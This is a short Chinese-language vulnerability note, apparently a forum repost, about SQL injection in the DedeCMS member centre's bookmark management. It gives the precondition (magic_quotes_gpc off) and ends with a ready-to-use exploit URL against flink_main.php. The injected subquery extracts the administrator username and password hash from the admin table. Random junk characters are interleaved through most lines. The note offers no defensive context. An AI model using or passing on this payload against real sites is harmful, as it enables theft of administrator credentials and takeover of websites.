DedeCMS会员中心SQL注射漏洞
! }7 B* ]) w' Z8 X需要magic_quotes_gpc = Off+ e4 `/ m% u( K+ _2 v
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码., J$ y4 }6 v, e0 S
8 x, v' h/ g- N$ @4 ^9 [& p* t# |* Y
DedeCMS会员中心书签管理SQL注射漏洞
& B+ {1 ]6 \2 w1 e6 p) I/ n成功利用该漏洞可获得管理员密码
8 Z c; O" M: a N# g: ` 7 w) T( f* E9 X2 [, Q' k
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
9 y% @5 S, L% m3 z : b% ~7 a3 W+ D3 C$ C& Q1 n
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r" h8 S# e' Q! Y" p" N$ }
|